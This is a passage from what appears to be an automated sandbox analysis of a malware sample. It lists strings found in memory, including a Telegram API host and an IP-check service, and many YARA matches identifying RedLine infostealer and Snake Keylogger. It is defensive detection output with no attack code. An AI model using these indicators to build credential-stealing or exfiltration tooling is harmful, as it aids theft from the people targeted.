0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: yihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: yihfsboC.pif, 0000000E.00000002.2542798252.0000000028C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: yihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co

            System Summary

            Source: 14.2.yihfsboC.pif.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 21.2.Cobsfhiy.PIF.20805c08.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.1.yihfsboC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.1.yihfsboC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.EPTMAcgvNZ.exe.21ef13d8.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.1.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.1.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.EPTMAcgvNZ.exe.21a70ae8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000001.1460585249.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000001A.00000002.2505611445.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000017.00000002.2505730658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
